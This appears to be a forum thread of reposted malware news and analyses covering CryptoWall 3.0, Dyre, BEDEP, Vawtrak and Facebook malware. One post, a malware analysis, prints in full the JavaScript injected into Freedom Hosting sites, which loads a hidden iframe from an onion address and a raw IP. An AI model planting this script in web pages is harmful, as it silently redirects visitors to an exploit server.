the infamous CryptoWall ransomware was spotted by Microsoft, just a week after the Cisco’s Talos Security Intelligence and Research Group announced the discovery of a new strain of the same malware that exploits the Tor network. The new variant of CryptoWall ransomware, like others, is distributed via malicious email and through malvertising campaigns. This variant was dubbed by the researchers CryptoWall 3.0 or Win32/Crowti, and it isn’t so different from previous instances. However, the experts noted that the names of the files containing the ransom demand have been changed to “HELP_DECRYPT.” This variant customizes files for each infected machine and provides victims a personalized link to a page that contains includes instructions. The instruction page is still reached through the Tor network. The victims of the CryptoWall 3.0 are given 7 days to pay $500 in Bitcoins if they want to decrypt their documents, but if they don’t pay in 7 days, the ransom increases to $1,000. On January 12, Microsoft identified 288 unique CryptoWall ver. 3.0 infections. “The graph below shows the spike after two days of no activity from 288 unique machines affected by this malware,” reads the post published Microsoft. Figure 9 – Cryptowall ver. 3.0 infections The French researcher Kafeine who analyzed CryptoWall 3.0 reported that the communications to C&C served are encoded with the RC4 cipher. Another feature implemented in the latest variant of the malware is the support of I2P (Invisible Internet Project) for C&C communications. “It seems communication with the C&C are Rc4 encoded (key seems to bealphanum sorted path of the POST ) and using i2p protocol,” said Kafeine. I2P is another anonymizing network used to hide the location of the control servers and make the botnet resilient the C&C to the law enforcement. Also recently, a new version of the popular black market Silk Road, Silk Road Reloaded, migrated on I2P, probably because at this moment there is the conviction that it is more secure than Tor. It happens now … new Dyre banking trojan variant A few days ago, the experts at TrendMicro spotted a new variant of the DYRE /Dyreza banking malware with new propagation and evasion techniques. The malware is spread through malicious emails containing the Upatre downloader disguised as a fax or the details of a package delivery, but once it is executed, the download drops the new Dyre variant, which in turn downloads the WORM_MAILSPAM.XDP worm. The propagation technique implemented by the cyber criminals is very effective. The worm exploits the Microsoft Outlook email client present on the victim’s machine to spread spam emails with the Upatre downloader attached to them. The emails aren’t sent to the victim’s contacts, instead they are sent to email addresses passed by the C&C server. Once the emails are sent by the worm, it deletes itself. This variant of Dyre uses hard-coded addresses for its IP addresses. The malware authors also implemented backup mechanisms for command and control infrastructure that rely on a URL provided by the malware’s domain generation algorithm (DGA) or a hard-coded address of a C&C server hidden on the Invisible Internet Project (I2P) network. Figure 10 – Dyre I2P In this case, the I2P network is used as a supplementary way to control the botnet, a choice to make it more resilient to attacks. Conclusion Security experts believe that malware authors will continue to exploit anonymizing networks like Tor and I2P. Analyzing the timeline of malware detections made by principal security firms, cyber criminals have been increasing the adoption of such networks since 2012. Figure 11 – Malware in the Deep Web (Security Affairs) Malware authors will exploit the Deep Web basically as a backup mechanism for their botnet and to make them more resistant to various kinds of attacks operated by law enforcement. References Skynet, the potential use of Tor as a bulletproof botnet - Security Affairs | Security Affairs OnionDuke: APT Attacks exploited the Tor Network | Security Affairs New crimekit Atrax exploits Tor, mines Bitcoin and much more | Security Affairs Detected 64-bit ZeuS banking trojan using Tor network | Security Affairs http://securityaffairs.co/wordpress/27885/cyber-crime/bifrose-uses-tor.html http://blogs.cisco.com/security/talos/cryptowall-2 http://malware.dontneedcoffee.com/2014/07/ctb-locker.html http://securityaffairs.co/wordpress/26763/cyber-crime/critroni-ransomware-use-tor.html http://securityaffairs.co/wordpress/31993/cyber-crime/cryptowall-ransomware-2-0.html http://securityaffairs.co/wordpress/21795/malware/tor-based-chewbacca-infect-pos.html https://community.rapid7.com/community/infosec/blog/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit https://www.defcon.org/images/defcon-18/dc-18-presentations/D.Brown/DEFCON-18-Brown-TorCnC.pdf https://blog.gdatasoftware.com/blog/article/botnet-command-server-hidden-in-tor.html http://securityaffairs.co/wordpress/13747/cyber-crime/http-botnets-the-dark-side-of-an-standard-protocol.html http://contagiodump.blogspot.it/2014/11/onionduke-samples.html?m=1 http://securelist.com/blog/events/58184/the-inevitable-move-64-bit-zeus-enhanced-with-tor/ http://securityaffairs.co/wordpress/17601/cyber-crime/botnet-behind-tor-traffic-surge.html [ulr=http://resources.infosecinstitute.com/hunting-malware-deep-web/]Source
  7. Section 1: Introduction 1.1 Overview Lately, a new malware has been seen spreading on Facebook.Facebook is an online social networking service which had over 1.3 billion active users as of June 2014. At that moment, three different variations and spreading methods have been observed. According to the samples that have been acquired,there are three quick campaigns that had been launched. There are some similarities on the way the malware achieves that huge amount of infected victims with a combination of pre-registered domains in the role of C&C server. 1.2 Background ? close friend of mine, who specialize in social media marketing and management, called me late at night requesting my help. He was terrified about the fact that most of his friend on Facebook platform, have been posting status with strange links.Having really a strong interest in malware researching, I decided with a friend to fully understand the process of infection and spreading. Read more: http://dl.packetstormsecurity.net/papers/general/facebook_malware.pdf
  8. Hackers are using a zero-day vulnerability in Adobe Flash to infect systems with a dangerous BEDEP malware variant. Trend Micro research engineer Alvin Bacani reported uncovering the campaign in a threat advisory, proving that hackers began targeting the zero-day less than a week after its discovery. "Continuing our analysis of the recent Adobe zero-day exploit, we find that the infection chain does not end with the Flash exploit, detected as SWF_EXPLOIT.MJST. Rather, the exploit downloads and executes malware belonging to the BEDEP family," read the advisory. Trend Micro reported uncovering the Flash flaw on 2 February, warning that attackers could target victims with malvertising attacks. The flaw is originally believed to have been targeted by hackers using the Angler Exploit Kit to send malicious automatic pop-up adverts. Bacani explained that BEDEP employs the same malvertising infection tactic, but uses the Hanjuan exploit kit to connect victim machines to a criminal botnet. "Based on our analysis, the infection chain begins with a site that hosts malvertisements. As the name implies, these are infected online advertisements," read the advisory. "Our recent findings also show that the malware's main purpose is to turn infected systems into botnets for other malicious intentions. "Additionally, BEDEP is known for carrying out advertising fraud routines and downloading additional malware." The full scale of the campaign remains unknown and the nature of the BEDEP malware makes tracking the attacks difficult. "The fact that the payloads are encoded can be seen as one way of evading detection. An encoded payload will be difficult to identify when passing through the network layer, or when scanned in any layer in an encoded state," noted Bacani. "BEDEP initially came undetected and unnoticed due to its heavy encryption and use of Microsoft file properties for its disguise as well as the use of seemingly legitimate export functions." The flaw is one of three recently discovered Flash zero-day vulnerabilities. The first two were uncovered by Adobe in January and are known to have been actively targeted by hackers. Source
  9. If someone shares a porn video on Facebook, beware. The latest threat to users involves a fake Flash Player update which pops up during a preview of a pornographic video. Once you click on the link to update your video player, malware (the name given to malicious software), downloads onto your computer. This Trojan horse software gives the creator of the malware remote access to your computer. They can then download viruses onto your computer. Security researcher Mohammad Faghani alerted users to the threat in a post on the Full Disclosure blog, which flags up network vulnerabilities. "The Trojan tags the infected user's friends with an enticing post," he explained. Faghani warned that the malware then tags up to 20 friends of the victim in the malicious post, thus leading to a larger number of those who could be affected. He believes it could "infect more than 110,000 users in two days". Faghani also said the malware was able to hijack keyboard and mouse movement. In response, Facebook said it was aware of the problem and was working to block it. In a statement issued to security news website Threatpost, a Facebook spokesperson said: "We use a number of automated systems to identify potentially harmful links and stop them from spreading. "In this case, we're aware of these malware varieties, which are typically hosted as browser extensions and distributed using links on social media sites. "We are blocking links to these scams, offering cleanup options, and pursuing additional measures to ensure that people continue to have a safe experience on Facebook." Last week, a hacker group called Lizard Squad had hinted it was responsible for the Facebook, Instagram and Tinder going down. Facebook denied it was hacked, saying the access issues were "not the result of a third party attack". Source
  10. For many years, different types of malware rank among the biggest IT security threats both in the business and the private domain. In order to protect oneself from the dangers of malware, numerous software manufacturers offer IT security products like antivirus and endpoint protection software. But these products alone offer no sufficient protection from malware that knows some tricks, as the results of our recent research with the topic antivirus evasion show. In the recent past, there were several computer-based attacks against IT networks that became public and raised a lot of media attention. Especially the attacks against the New York Times [1] and the Washington Post [2] at the beginning of 2013 had a world-wide media coverage and also heated the debate about such cyber threats with manufacturers of IT security products like antivirus and endpoint protection software. In both mentioned cases, attackers were able to install malware on computer systems of employees in order to literally spy on the affected companies – and this probably undetected for several months. Once more, incidences like these have pointed out that in spite of the use of IT security products like antivirus software or host intrusion detection/prevention software (HIDS/HIPS) such attacks cannot be entirely prevented. This kind of threat illustrates that enterprises and also government agencies require a master plan with a working information security management and security awareness of all employees. This paper discusses how developers of malware like trojan horses (in short trojans), viruses, and worms proceed to hide their malicious intentions from antivirus software. Thereby, current results of our recent research are presented and recommendations are given for dealing with threats and security risks caused by malware. How Antivirus Software Works Current antivirus software, no matter if a standalone software product or a component of a software suite (host intrusion detection/prevention software, endpoint protection software, etc.), uses different methods to detect known and unknown threats by means of malware. In general, these methods used for protecting computer systems from unwanted, malicious software can be assigned to the following two strategies: 1. Blacklisting 2. Whitelisting In the context of antivirus software, the two terms blacklisting and whitelisting simply mean that the execution of a program is either explicitly forbidden (being on a black list) or explicitly allowed (being on a white list). Thus, by following the blacklisting approach antivirus software will prevent the execution of programs that are Read more: http://dl.packetstormsecurity.net/papers/general/outsmarted-malware.pdf
  11. Researchers have peeled back more layers on Vawtrak, a relatively new banking Trojan so complex that those who have taken it apart have likened it to a Matryoshka, or Russian nesting doll. Virus Bulletin published a deep dive on the malware penned by Raul Alvarez, a researcher with Fortinet, yesterday. Like a set of dominos, the malware involves a series of steps where each one triggers the next. In this case, the first executable binary triggers the second binary, but before doing so, it needs to decode it by calling a trio of APIs and decrypting a large block of data. “Vawtrak’s overlay area holds an encrypted copy of the executable binary that is used in the next layer. It is to be transferred and decrypted into the malware’s virtual memory space,” Alvarez writes. After calling another API, the malware also drops an image file, “Diana-23.jpg,” to con users into thinking that’s the only thing the executable does. After a series of modules are parsed and even more APIs are called upon the second layer of the malware, the .exe mainOUT-crypted-5, is decrypted and decompressed. By this point, following decompression, the malware has produced what Alvarez refers to as the “third doll” of the malware, an executable binary that’s the simplest of the four layers. Decrypting the large data block This part of Vawtrak has no protection at all, meaning no decryption or hashing is used. The third shell of the malware removes software restrictions and tries to restrict any permissions associated with any antimalware apps looking for it. Lastly, the fourth doll in this analogy, if everything has gone according to plan, decrypts data and produces a heap that contains an executable binary, a .DLL disguised as a .DAT file, with a random file name. Once deployed, the malware uses two more APIs, the RegCreateKeyA and RegSetValueExW to ensure the malware sticks around following a restart. While the malware which was first written about late last year was first thought to be targeting banks in Japan, Alvarez claims it’s “recently broadened its geographic scope” and has become more sophisticated over the last several months. “The ingenuity and skills shown by Vawtrak are not simple, but concise,” Alvarez writes in closing. In September researchers learned that Vawtrak, which was masquerading as Neverquest at the time, had evolved to target social media, retailers and game portals. Recent configurations allowed the malware to sniff out banking sessions, modify data in web traffic, break encryption and steal log-in credentials and other sensitive information. Source
  12. # MalwareMustDie! # This is the malicious Javascript set codes injected to the Freedom Hosting site # It contents the IFRAMER Malware method to redirect the victim to infector site, in url: # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 # # Original copy at: www.twitlonger.com/show/n_1rlo0uu # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!! # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/ # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html # Ref: http://www.twitlonger.com/show/n_1rlo0uu # Ref: http://pastebin.com/bu2Ya0n6 # Ref: http://pastebin.com/pmGEj9bV # MalwareMustDie!# This is the malicious Javascript set codes injected to the Freedom Hosting site # It contents the IFRAMER Malware method to redirect the victim to infector site, in url: # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 # # Original copy at: www.twitlonger.com/show/n_1rlo0uu # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!! # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/ # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html # Ref: http://www.twitlonger.com/show/n_1rlo0uu # Ref: http://pastebin.com/bu2Ya0n6 # Ref: http://pastebin.com/pmGEj9bV // Case 1 function createCookie(name,value,minutes) { if (minutes) { var date = new Date(); date.setTime(date.getTime()+(minutes*60*1000)); var expires = "; expires="+date.toGMTString(); } else var expires = ""; document.cookie = name+"="+value+expires+"; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } function isFF() { return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent)); } function updatify() { var iframe = document.createElement('iframe'); iframe.style.display = "inline"; iframe.frameBorder = "0"; iframe.scrolling = "no"; iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0"; iframe.height = "5"; iframe.width = "*"; document.body.appendChild(iframe); } function format_quick() { if ( ! readCookie("n_serv") ) { createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30); updatify(); } } function isReady() { if ( document.readyState === "interactive" || document.readyState === "complete" ) { if ( isFF() ) { format_quick(); } } else { setTimeout(isReady, 250); } } setTimeout(isReady, 250); // Case 2 function createCookie(name, value, minutes) { if (minutes) { var date = new Date(); date.setTime(date.getTime() + (minutes * 60 * 1000)); var expires = "; expires=" + date.toGMTString(); } else var expires = ""; document.cookie = name + "=" + value + expires + "; path=/"; } function readCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i = 0; i < ca.length; i++) { var c = ca; while (c.charAt(0) == ' ') c = c.substring(1, c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length); } return null; } function isFF() { return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent)); } function updatify() { var iframe = document.createElement('iframe'); iframe.style.display = "inline"; iframe.frameBorder = "0"; iframe.scrolling = "no"; iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY iframe.height = "5"; iframe.width = "*"; document.body.appendChild(iframe); } function freedomhost() { if (!readCookie("n_serv")) { createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30); updatify(); } } function isReady() { if (document.readyState === "interactive" || document.readyState === "complete") { if (isFF()) { //window.alert(window.location + "Firefox Detected.") freedomhost(); } } else { setTimeout(isReady, 250); } } setTimeout(isReady, 250); // Noted, same method, // second script is w/IP info callback, contacting remote host as per marked (1) IP Address: 65.222.202.53 City: Triadelphia State or Region: West Virginia Country: United States ISP: Verizon Business Latitude & Longitude: 40.0900-80.6220 Domain: verizonbusiness.com ZIP Code: 26059 --- #MalwareMustDie! @unixfreaxjp Source
  13. The hacker group behind a notorious campaign targeting a critical vulnerability affecting multiple versions of Microsoft Internet Explorer has altered its strategy to spread malware using social media, according to security firm FireEye. FireEye senior threat analyst Mike Scott reported the Clandestine Fox hackers altered their attack strategy after Microsoft issued a patch for the IE flaw, in a blog post. Scott said FireEye uncovered the new attack campaign after detecting a number of malicious social network messages targeting its customers. "The attackers used a combination of direct contact via social networks as well as contact via email, to communicate with their intended targets and send malicious attachments. In addition, in almost all cases, the attackers used the target's personal email address, rather than his or her work address," read the post. "This could be by design, with a view toward circumventing the more comprehensive email security technologies that most companies have deployed, or also due to many people having their social network accounts linked to their personal rather than work email addresses." FireEye director of technology strategy Jason Steer told V3 while the Clandestine Fox strikes are only targeting very specific groups, the effectiveness of the tactic means it is only a matter of time before the wider crime community learns from them. "Sites like Facebook and LinkedIn are prime sites to look for and target people. If you create a fake profile with a throwaway email account you can be anyone you like and if you access it via Tor no one knows where you connect from either and hence hard to trace back. Then you connect with the target," he said. "These types of attacks will be reused and recycled into attacks by other gangs in the cybercrime industry as the effectiveness of their APT-style attacks slows. It will then be used by hacktivists, lone hackers and then by general cyber criminals all looking to use their hack against targets of interest or finally against the general man on the street." Steer recommended businesses take a variety of precautionary measures to protect themselves from future social media-based hack campaigns. These include deleting suspicious messages and requests from people you don't know without opening them and using long passwords that are not shared across multiple accounts. Clandestine Fox is one of many hacker campaigns uncovered in recent months. Crowdstrike reported discovering a Putter Panda hack campaign spying on high-tech firms involved in space, aerospace and communications industries earlier this week. Via Clandestine Fox hackers spreading malware via Facebook, Twitter and LinkedIn - IT News from V3.co.uk
  14. Data breaches and security incidents are a constant in the headlines these days. Hackers and cyber criminals are motivated by status or money and finding new innovative and more creative attacks to achieve this. One of them are, Digital Bank robbery - where the thieves didn't need masks and guns to pull off the job, all they need are - Hacking Skills, a computer and the Internet. Another way is Cyber extortion - threat of attack against an enterprise or a bank, coupled with a demand for money to avert or stop the attack. According to Haaretz news, A Hacker - who is the operator of a biggest botnet malware network in the Israel, has threatens 3 major Israeli banks, i.e. Israel Discount Bank, Bank Yahav and the First International Bank of Israel. Banks database, network and websites were not breached in this case, rather the hacker claimed that he holds a huge financial trojan botnet network in Israel that have already infected millions of systems across the nation and collected a massive dump of stolen personal information, passwords, banking information and credit card numbers of 3.7 Million users. The hacker has demanded the payoff in Bitcoin, a untraceable virtual currency, perfect for blackmailers and cyber criminals. Bitcoin is not backed by any central bank or government and can be transferred "peer to peer" between any two people anywhere. Banks declined to comment on the report and immediately reported the threat to the Israel Police. According to the source, some of them do not see the threat as serious. Bank of Israel held a meeting on Tuesday on the issue, we will update you soon about their next step with a new article. Cyber attacks are becoming more and more advanced and sophisticated, more or less any company in the world is on the list of targets to rob. You should keep updating your knowledge about the cyber world to Stay Safe from all threats. Source: Hacker threatens to sell data of 3.7 Million Israeli Bank Customers, demands extortion money in Bitcoin Nota personala: Sa nu fiti pacaliti ca si ziaristii sa folositi termenul hacker pentru orice Escroc care fura bani.
  15. Am decis sa postez aici o lista cu mai multe siteuri de analizat malware , url si antivirusi online. Sper sa va fie de folos:) Malware Scan http://www.virustotal.com/ [File and Website] Jotti's malware scan Anubis: Analyzing Unknown Binaries VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 37 AntiVirus Engines! ThreatExpert - Online File Scanner Public Sandbox - Submit a Sample for Malware Analysis Eureka Malware Analysis Page Wepawet - Home [File and Website] https://www.metascan-online.com/ Xandora - Your Online Binary Analyser Free Online Multi Engine Antivirus File and URL Scanner - Powered by NoVirusThanks.org [File and Website] Irish Cream Service - Free Antivirus Scan Service [File and Website] ScanThis! Free online virus scanner [File and Website] Zscaler Zulu URL Risk Analyzer - Zulu Website Scan Automated Exploit Analysis Online Virus Scanner - Scan Links for Malware, Trojans and Viruses Sucuri SiteCheck - Free Website Malware Scanner Online Webpage Scanning for Malware Attacks | Web Inspector Online Scan urlquery.net - Free URL scanner Servicio de seguridad web, desenmascarame Scan websites for exploits, malware and other malicious threats using multiple web reputation engines and domain blacklists jsunpack - a generic JavaScript unpacker [Website, Javascript, PDF, HTML and pcap] Website/URL/Link Scanner Safety Check for Phishing, Malware, Viruses - ScanURL.net AVG Online Virus Scanner | Scan Web Pages | AVG LinkScanner Drop Zone FREE Online Website Malware Scanner | Website Security Monitoring & Malware Removal | Quttera Dr.Web online scanners https://www.trustedsource.org/?p=mcafee UrlScan 3.1 : The Official Microsoft IIS Site UnThreat Online Scanner Antivirus Online http://quickscan.bitdefender.com/ro/ Free Online Virus Scan - Bitdefender Online Virus Scanner ESET Free Online Scanner :: Complete Malware Detection :: ESET Emsisoft Web Malware Scan | Dual-Engine Browser Scanner - Free removal of Viruses, Bots, Spyware, Keyloggers, Trojans and Rootkits Free Online Virus Scan - Antivirus Software - Trend Micro USA Panda Activescan | Free Online Antivirus | Free Virus Disinfection - Panda Security https://www.grc.com/x/ne.dll?bh0bkyd2 :: WindowSecurity.com How To - Remove threats - Removal Tools | F-Secure Rising Online Virus Scanner FREE ANTIVIRUS online: ActiveScan 2.0 - PANDA SECURITY https://security.symantec.com/sscv6/GetBrowser.asp?pkj=QTHYGXMQPHPUCCBMMHL&langid=ie&venid=sym&plfid=00&from=/sscv6/home.asp PC Flank: Make sure you're protected on all sides. Sursa: cleanbytes.net/malware-online-scanners
  16. Security researchers at TrenMicro have identified a new type of malware that update their configuration in a very interesting way. This means that compromised machines are configured to download JPEG files that contain encrypted configuration files/binaries without victim’s knowledge. The image is hosted on web server located in Asia-Pacific region and contains three types of settings: configuration file (Type A) configuration file (Type binary content (either DLL or EXE files) The first type of configuration is the standard C&C settings where it allows attacker to send instruction to victim machines and customize the hosts or update the malware to use another type of configuration. This technique makes the botnet resist in case of functionality issue. The second configuration file is containing several process names for antimalwares and hostnames of the compromised network. JPEG images may not only include configurations but it also host a binary content that allows malware authors to update the malicious software packages at any moment. The way that cyber-criminal are hiding their activities is becoming more and more complex to not identify their network and techniques. Hosting a malicious image on web server is hard to detect with the security software. This makes the attack more resilient and not spotted by security software. JPEG files used by attacker to host configuration and binaries for the Malware TrendMicro also revealed that reversing the images allowed to identify hostnames and IP addresses of infected machine’s/networks, list of images used in the cyber attack that is accessed by the malware beside the operating system version installed on infected machines. Via Image Hosted on Web Server Serving Malware | SecTechno
  17. Hacker reported vulnerability in Kaspersky website; Demonstrated malware spreading technique The cyber Security Analyst 'Ebrahim Hegazy' (@Zigoo0) Consultant at Q-CERT has found an "Unvalidated Redirection Vulnerability" in the website of the giant security solutions vendor "Kaspersky". Ebrahim, who found a SQL Injection in "Avira" website last month, this time he found a Unvalidated Redirection Vulnerability that could be exploited for various purposes such as: Cloned websites (Phishing pages) It could also be used by Black Hats for Malware spreading In the specific case what is very striking is that the link usable for the attacks is originated by a security firm like Kaspersky with serious consequences. Would you trust a link from your security vendor? Absolutely Yes! But imagine your security vendor is asking you to download a malware! To explain how dangerous the situation is when your security vendor is vulnerable, Ebrahim Hegazy sent me a video explaining the malware spreading scenario to simulate a Black Hat's exploiting Unvalidated Redirection Vulnerability in Kaspersky website to serve a malware. explained Ebrahim Hegazy.After the researcher reported the vulnerability to Kaspersky team, it took about 2 months to fix the vulnerability, it is really a long time considering that if a hacker had found this flaw before Hagazy he could spread links using Kaspersky.com. The consequences of unfixing of such vulnerability are critical Wide infection - since the redirection is coming from a trusted source especially if the attacker registered a domain name similar to Kaspersky.com Very bad reputation for Kaspersky company. Your most trusted resource "Your Antivirus" will be your worst enemy! Would you trust anything else! And many other consequences. The vulnerability was reported to Kaspersky web-team and is now fixed. Via: Hacker reported vulnerability in Kaspersky website; Demonstrated malware spreading technique - The Hacker News
  18. Two power plants in the US were affected by malware attacks in 2012, a security authority has said. US authorities did not specify which plants had been hit - and to what extent In its latest quarterly newsletter, the US Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) said "common and sophisticated" attacks had taken place. Malware had infected each plant's system after being inadvertently brought in on a USB stick, it said. The ICS-CERT said it expected a rise in the number of similar attacks. Malware can typically used by cyber-attackers to gain remote access to systems, or to steal data. In the newsletter, authorities said: "The malware was discovered when an employee asked company IT staff to inspect his USB drive after experiencing intermittent issues with the drive's operation. "The employee routinely used this USB drive for backing up control systems configurations within the control environment." And at a separate facility, more malware was found. "A third-party technician used a USB-drive to upload software updates during a scheduled outage for equipment upgrades," the report said. "Unknown to the technician, the USB-drive was infected with crimeware. "The infection resulted in downtime for the impacted systems and delayed the plant restart by approximately three weeks." Physical effects The authority did not go into explicit details regarding the malware itself, but did stress that the use of removable media had to be reviewed and tightened. "Such practices will mitigate many issues that could lead to extended system downtime," it said. "Defence-in-depth strategies are also essential in planning control system networks and in providing protections to reduce the risk of impacts from cyber-events." In recent years, power plants have been the target of increasingly destructive malware and viruses - a bridge between damage in a digital sense, such as data loss of theft, and actual physical infrastructure. In 2010, the Stuxnet virus was said to have damaged critical parts of Iran's nuclear infrastructure. Security firm Symantec research said it believed Stuxnet had been designed to hit motors controlling centrifuges and thus disrupt the creation of uranium fuel pellets. A UN weapons inspector later said he believed the attack had set back Iran's nuclear programme. No country has claimed responsibility for the attack, but a New York Times report last year, written by the author of a book on the attacks, pointed the finger at the US. Journalist David E Sanger wrote that the US had acted with the co-operation of Israel. Via BBC News - US plants hit by USB stick malware attack
  19. http://www.geekzone.co.nz/foobar/6229 Titlul original este How to write a Linux virus in 5 easy steps, dar autorul l-a updatat dupa ce articolul a fost discutat pe Slashdot: http://it.slashdot.org/article.pl?sid=09/02/17/1526244
×
×
  • Create New...